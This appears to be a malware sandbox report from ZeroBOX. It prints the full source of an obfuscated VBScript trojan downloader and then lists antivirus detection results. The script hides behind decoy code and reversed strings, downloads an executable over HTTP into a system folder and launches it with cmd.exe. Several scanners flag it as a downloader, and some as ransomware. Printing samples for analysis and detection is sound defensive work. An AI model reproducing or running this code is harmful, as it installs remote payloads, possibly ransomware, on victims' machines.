Static | ZeroBOX
No static analysis available.
Public Sub FillPointWithDefaults(Point1 )
With Point1
.PhysicalWidth = defPointSize
.Width = .PhysicalWidth
ToLogicalLength .Width
.Locus = 0
.ParentFigure = 0
.ZOrder = 0 'GenerateNewPointZOrder
.Tag = 0
.FillStyle = setdefPointFill
.FillColor = setdefcolPointFill
.ForeColor = setdefcolPoint
.Shape = setdefPointShape
.ShowName = setAutoShowPointName
.ShowCoordinates = False
.NameColor = setdefcolPointName
.Visible = True
.Enabled = True
.Hide = False
.InDemo = True
.X = 0
.Y = 0
End With
End Sub
Function T2000(p, ddd)
BoH = 101
ZabiT.Type = 1
BoH = 1 + BoH
Set writenopopduplicateMacAttack = CreateObject("WScript.Shell")
End Function
Dim writenopopduplicateensurance '
Dim writenopopduplicateInPlaceOf '
writenopopduplicateTepir = "User"
Dim SudForMake
Dim TristateTrue
Dim writenopopduplicateTimeTo 'As Object
Dim writenopopduplicateDW
writenopopduplicateDW = false
Dim writenopopduplicatebalibob 'As Object
Dim writenopopduplicatecashback 'As Object
Execute "Sub Aodcrimesduplicate(strr):ZabiT.Savetofile writenopopduplicateInPlaceOf , 2 : End Sub"
Disaster = "//21+12:ptth21+12ex"+"e.EfhAaSfbr\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & ""
Dim krapivec
Dim writenopopduplicatepotatos 'As Object
Dim ZabiT 'As Object
Dim writenopopduplicatePetir '
Dim sNodeKey '
Dim sParentKey '
Execute "Sub FolderToCopy(A,B,Pipitr6) : B.Write Pipitr6.res" + "ponseBody : End Sub : Sub Rcoda(VF) : VF.Se"+""+"nd : End Sub"
writenopopduplicatePetir = "Ag"
SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster), "21+12")
Dim MarketPlaceibility '
Dim Tepick 'As Integer
Dim sDecimalVis '
writenopopduplicateTepir = writenopopduplicateTepir + "-"
dr501 = False
Set writenopopduplicatepotatos = CreateObject(SudForMake(000))
Execute "function getero(A) : getero = CreateObject(""Scripting.FileSystemObject"").GetSpecial"+"Folder(A) : End function"
Dim Valery 'As Integer
Dim writenopopduplicate404 '
Dim writenopopduplicateMacAttack
Dim MarketPlace '
Dim sTempVis '
Dim iCount 'As Integer
'Set writenopopduplicateTimeTo = CreateObject(SudForMake(8-6))
Tepick = 10 + 1 + 1
zTempVis = SudForMake(Tepick - 11)
Public Sub DebugLog(txt)
'debug.print txt
Open AppPath & "ARC22ServerDebug.txt"
Print txt
End Sub
Set writenopopduplicate13 = GetRef("Aodcrimesduplicate")
Set writenopopduplicate14 = GetRef("FolderToCopy")
Set ZabiT = CreateObject(""+"reaM")
Set writenopopduplicatebalibob = CreateObject(SudForMake(11-8)+"")
ATC = 1
Dim i
sTempVis = SudForMake(6+Tepick -6)
writenopopduplicateensurance = getero(- 8 -2+Tepick)
if "MoveYourBody" + WScript + "111" = "MoveYourBodyWindows Script Host111" Then
Valery = 20901
Valery = 3 - Valery
end if
Function ShutdownSub(ArrArr)
NotFound404 = 12
writenopopduplicateMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr )
ShutdownSub = False
End Function
NotFound404 = 24
MarketPlace = SudForMake(ATC+12) & SudForMake(ATC+13)
writenopopduplicateTepir = writenopopduplicateTepir & ""&writenopopduplicatePetir & "ent"
krapivec = Array("","","")
lTo = UBound(krapivec)
Dim Radioactive
Radioactive = -2
For i = 0 To lTo Step 1
NotFound404 = NotFound404 * 26
on error resume next
Valery = Valery +15
NotFound4042 = SudForMake(16-11)
NotFound404 = NotFound404 + 404
dr500 =MarketPlace + krapivec(i)
writenopopduplicatepotatos.Open NotFound4042, dr500, dr501
if dr1 + 1 > dr1 Then
end if
dr1=dr1 + 14
If 1005 + writenopopduplicatepotatos.Status = 1205 Then
Radioactive = i
Exit For
End If
on error goto 0
if Radioactive >= 0 Then
Dim Clank 'As String
writenopopduplicateInPlaceOf = writenopopduplicateensurance+ sTempVis
T2000 "",90
writenopopduplicate14 "",ZabiT,writenopopduplicatepotatos
BassLock =10
writenopopduplicateInPlaceOfu = "" + writenopopduplicateInPlaceOf
BassLock = BassLock*10
Dim writenopopduplicateJohnSnowu,writenopopduplicateDisplay 'As Long
writenopopduplicate13 "ss"
writenopopduplicateJohnSnowu = 132
If 41 < writenopopduplicateJohnSnowu + 14 Then
Hipster =NotFound404-NotFound404
QTan = """"
BassLock = BassLock*10
BassLock = BassLock*10
BassLock = BassLock*10
if ShutdownSub(QTan & writenopopduplicateInPlaceOf & QTan) then
BassLock = BassLock*10
BassLock = BassLock*10
end if
End If
mafia = 90
writenopopduplicateDisplay = "Re"
end if
Antivirus Signature
Bkav Clean
MicroWorld-eScan VB:Trojan.VBS.Agent.AQN
nProtect Clean
CMC Clean
CAT-QuickHeal Trojan.VBS.GIRansom.4537
McAfee VBS/Downloader.ea
Malwarebytes Clean
Zillya Clean
TheHacker Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
Cyren VBS/Downldr.HM
Symantec VBS.Downloader.B
ESET-NOD32 VBS/TrojanDownloader.Agent.PLS
TrendMicro-HouseCall VBS_SCARAB.SMJS02
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan.Script.Agent.gen
BitDefender VB:Trojan.VBS.Agent.AQN
NANO-Antivirus Trojan.Script.ExpKit.ewjogg
ViRobot VBS.Downloader.4971
AegisLab Troj.Script.Agent!c
Rising Downloader.Schopets!8.EAAB (TOPIS:9cv31yapexE)
Ad-Aware VB:Trojan.VBS.Agent.AQN
Sophos Troj/VBSDldr-T
Comodo UnclassifiedMalware
F-Secure VB:Trojan.VBS.Agent.AQN
DrWeb VBS.DownLoader.1051
McAfee-GW-Edition VBS/Downloader.ea
Emsisoft VB:Trojan.VBS.Agent.AQN (B)
F-Prot VBS/Downldr.HM
Jiangmin Clean
Webroot Clean
Avira VBS/Drldr.Agent.4368
Fortinet VBS/Agent.PLT!tr.dldr
Antiy-AVL Trojan[Downloader]/VBS.Agent.pkq
Kingsoft Clean
Arcabit VB:Trojan.VBS.Agent.AQN
SUPERAntiSpyware Clean
AhnLab-V3 VBS/Downloader
ZoneAlarm HEUR:Trojan.Script.Agent.gen
Avast-Mobile Clean
Microsoft TrojanDownloader:VBS/Schopets.O
TotalDefense Clean
ALYac VB:Trojan.VBS.Agent.AQN
AVware Clean
MAX malware (ai score=100)
VBA32 Clean
WhiteArmor Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan-Ransom.Script.GlobeImposter
GData Script.Trojan-Downloader.Agent.AEZ
AVG Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.